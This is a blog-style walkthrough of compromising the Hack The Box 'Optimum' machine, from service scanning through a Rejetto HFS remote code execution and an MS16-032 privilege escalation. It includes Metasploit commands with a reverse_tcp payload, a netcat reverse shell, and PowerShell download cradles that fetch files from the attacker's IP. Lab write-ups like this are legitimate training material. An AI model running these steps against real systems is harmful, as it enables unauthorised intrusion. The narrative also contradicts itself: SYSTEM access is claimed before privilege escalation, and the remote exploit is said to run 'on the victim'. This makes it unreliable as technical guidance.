Keep Calm and Hack The Box – Optimum

Greetings fellow hackers! Today we‘ll be taking on the Optimum machine from Hack The Box. For those unfamiliar, Hack The Box is an online platform that lets you test and advance your penetration testing skills on virtual machines in a safe, legal environment. They‘ve got dozens of realistic boxes with real-world configurations for you to practice on.

Optimum is a beginner-friendly Windows box that focuses on finding and exploiting known vulnerabilities in installed services. The path to both the user and root flag is fairly straightforward, but still provides a good lesson in proper enumeration and taking advantage of public exploits. We‘ll be using some common tools like Nmap and Metasploit to complete this challenge.

I‘ll be working from Kali Linux for this, but feel free to follow along in your distro of choice. Let‘s boot up our attack machine and get started!

Step 1 – Scanning the Network

No hacking attempt should begin without proper enumeration of the target. We need to know what this machine is running if we want to attack it. My go-to tool for network scanning is Nmap.

If you‘re not familiar with Nmap, it‘s a powerful scanner used to discover hosts and services on a network by sending packets and analyzing the responses. It‘s an essential tool for any pentester or hacker. I prefer to run it from the command line, but you can also use the graphical version, Zenmap, if you‘d like.

Let‘s do an initial scan with a few common flags:

nmap -sV -O -F --version-light 10.10.10.8

  • -sV: Probe open ports to determine service/version info
  • -O: Enable OS detection
  • -F: Fast mode – Scan fewer ports than the default scan
  • –version-light: Limit to most likely probes (intensity 2)

This will give us a quick look at what‘s running on the box without being too intrusive. Our results show port 80 open running HttpFileServer httpd 2.3. This is definitely interesting and warrants further investigation.

For a more in-depth look we can do a full scan with:

nmap -sV -O -p- --script vulners 10.10.10.8

  • -p-: Scan all 65535 ports
  • –script: Scan with a specific nmap script, in this case vulners to look for vulnerabilities

However, for the sake of time, we‘ll move on since we already have a good target to look into – that HTTP server.

Step 2 – Enumerating the Web Server

Browsing to http://10.10.10.8 in our web browser, we‘re greeted with the landing page for HttpFileServer 2.3. At the bottom it conveniently tells us the exact version number which will make searching for exploits easier.

So what exactly is HttpFileServer? It‘s a free, easy to use web server software specifically designed for sharing files over HTTP. Developed by a company called Rejetto, it allows you to host files on your computer and access them from anywhere through a web browser. While convenient, it‘s not the most secure software which is good news for us as hackers.

To look for any publicly known exploits for HttpFileServer 2.3, we‘ll use the handy searchsploit tool. Searchsploit scrapes exploit-db.com which is a database of thousands of public exploits and corresponding vulnerable software. Let‘s see what it has for HttpFileServer:

searchsploit httpfileserver

This returns quite a few results, but one in particular catches my eye:

Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)

The description says it allows arbitrary code execution by using a Metasploit module. Sounds promising! To examine the exploit in detail we can use:

searchsploit -x 34926

This shows us the actual exploit code and a nice description of how it works. The vulnerability is due to a flaw in the parsing of HTTP GET requests which allows us to inject system commands via a null byte terminator. Great, this is exactly what we need to get a shell on the box. Time to fire up Metasploit!

Step 3 – Initial Compromise with Metasploit

Metasploit is an incredibly powerful platform that makes executing exploits like this a breeze. It even has a handy search function to look for modules:

msf > search rejetto

Sure enough, our exploit shows up as exploit/windows/http/rejetto_hfs_exec. Let‘s select it and take a look at the options:


msf > use exploit/windows/http/rejetto_hfs_exec
msf exploit(rejetto_hfs_exec) > show options

We‘ll need to set the RHOST to our target IP, 10.10.10.8, and RPORT to 80. Since it‘s a remote code execution, we‘ll also need to provide it a payload to execute. Let‘s go with the trusty windows/meterpreter/reverse_tcp. We‘ll also need to set LHOST to our own IP where we want the reverse shell connecting back to.


msf exploit(rejetto_hfs_exec) > set RHOST 10.10.10.8
msf exploit(rejetto_hfs_exec) > set RPORT 80
msf exploit(rejetto_hfs_exec) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(rejetto_hfs_exec) > set LHOST 10.10.14.14

Perfect, let‘s run this and see what happens:


msf exploit(rejetto_hfs_exec) > exploit

Success! After a brief moment we‘re greeted with a flashing red Meterpreter prompt. We‘ve got a foothold!

For those wondering, Meterpreter is an advanced, dynamic payload that executes in memory and provides useful built-in commands for the hacker. Typing help will give you a list of all the possibilities such as file transfers, keylogging, and screenshots.

First things first, let‘s see what user we‘re running as:

meterpreter > getuid

Looks like we‘re authority\system which is the highest privilege account in Windows. That‘s a good sign, but let‘s dig a little deeper with sysinfo to see what version of Windows and any installed patches.

The output tells us this is Windows 2012 R2 64-bit and lists off the installed patches denoted by their KB number. Looks like the OS hasn‘t been updated in a while which means it‘s likely vulnerable to some public exploits.

Let‘s grab that user flag:


meterpreter > search -f user.txt
meterpreter > cat C:\Users\kostas\Desktop\user.txt

User flag is ours! On to the priviledge escalation.

Step 4 – Privilege Escalation – Attempt 1

First, let‘s see if Metasploit has any local exploit suggester modules:


meterpreter > background
msf > use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > show options
msf post(local_exploit_suggester) > set session 1
msf post(local_exploit_suggester) > set showdescription true
msf post(local_exploit_suggester) > run

The module runs and provides a list of possible exploits that match the OS and architecture. It‘s a good place to start, however, none of these seem to work for our current session. Must be because we used the 32-bit meterpreter payload but the OS is 64-bit. We‘ll need to find a different approach.

After some searching online, I came across a promising lead – MS16-032. This is a Windows privilege escalation exploit that takes advantage of a flaw in the Secondary Logon Service. Best of all, it affects Windows 8.1 and Server 2012 R2 which is what Optimum is running.

There‘s a Metasploit module for it too:

exploit/windows/local/ms16_032_secondary_logon_handle_privesc

I set the session to my meterpreter session and the target to Windows x64, but no luck getting a shell. Hmm, seems like we‘ll have to take the manual approach and trigger the exploit ourselves outside of Metasploit.

Step 5 – Low-Privilege Shell

Before we dive into the privilege escalation exploit, let‘s get a more stable shell as the kostas user. There‘s another exploit for Rejetto HFS that essentially does the same thing as the Metasploit module, but runs a simple netcat reverse shell:

searchsploit -x 39161

The exploit is written in Python and seems simple enough. It crafts a special HTTP GET request that writes a netcat command to a temporary batch file and executes it. All we need to do is change the IP address in the script to our attack machine and start a netcat listener.

On our attack machine:


python -m SimpleHTTPServer 80
nc -nlvp 443

The Python command starts a basic HTTP server in the current directory so the victim can download netcat from us (make sure you have a nc.exe in your directory). The nc command starts a netcat listener on port 443.

On the victim, download and run the modified exploit:


powershell -c "(new-object System.Net.WebClient).DownloadFile(‘http://10.10.14.14/39161.py‘, ‘39161.py‘)"
python 39161.py 10.10.10.8 80

After running the exploit, our netcat listener catches the connection and we‘ve got a shell as kostas! Much better. We already grabbed the user flag, so let‘s get root.

Step 6 – Enumeration for Privesc

To exploit MS16-032 we‘ll need to compile it from source on our Linux attack machine. But let‘s first confirm the OS is vulnerable.

For that I like to use Windows-Exploit-Suggester. It works by comparing the output of the systeminfo command to a database of Windows exploits. Very handy for quickly identifying vulnerabilities.


systeminfo > systeminfo.txt
python windows-exploit-suggester.py --database 2017-02-09-mssb.xls --systeminfo systeminfo.txt

The results show the OS is missing quite a few critical patches, MS16-032 being one of them. Time to compile the exploit and transfer it over.

Step 7 – Privilege Escalation – MS16-032

MS16-032 exploits a flaw in the way the Secondary Logon Service handles impersonation tokens. The source code is available on ExploitDB. We‘ll compile it with mingw:

i686-w64-mingw32-gcc MS16-032.c -o MS16-032.exe

With our compiled exploit ready, let‘s set up another Python HTTP server and transfer MS16-032.exe to the victim machine:


python -m SimpleHTTPServer 80
(On victim) powershell -c "(new-object System.Net.WebClient).DownloadFile(‘http://10.10.14.14/MS16-032.exe‘, ‘MS16-032.exe‘)"

Time for the moment of truth, let‘s run it:

MS16-032.exe "C:\Windows\System32\cmd.exe"

Boom! We‘ve got a shell as NT AUTHORITY\SYSTEM! The exploit worked perfectly. I‘ll spare you the details of how it works under the hood, but it basically involves abusing the lack of permission checks in the Secondary Logon Service to spawn a cmd.exe process with SYSTEM privileges.

Let‘s claim our prize:


C:\Users\Administrator\Desktop>type root.txt

Got the root flag! Another box pwned thanks to unpatched vulnerabilities and public exploits.

Conclusion

There you have it folks, Optimum from Hack The Box. The key takeaways here are the importance of keeping software updated with the latest security patches and being vigilant of what services you expose to the network. A neglected HTTP server was all it took to compromise this machine.

Doing these boxes is a great way to develop your hacking skills in a safe environment. I encourage you to create an account on HackTheBox and try Optimum and other boxes yourself. It‘s an excellent learning resource.

Feel free to reach out if you have any questions! You can usually find me messing around on HackTheBox, participating in CTFs, or ranting about cyber security on Twitter. Hack the planet!

Similar Posts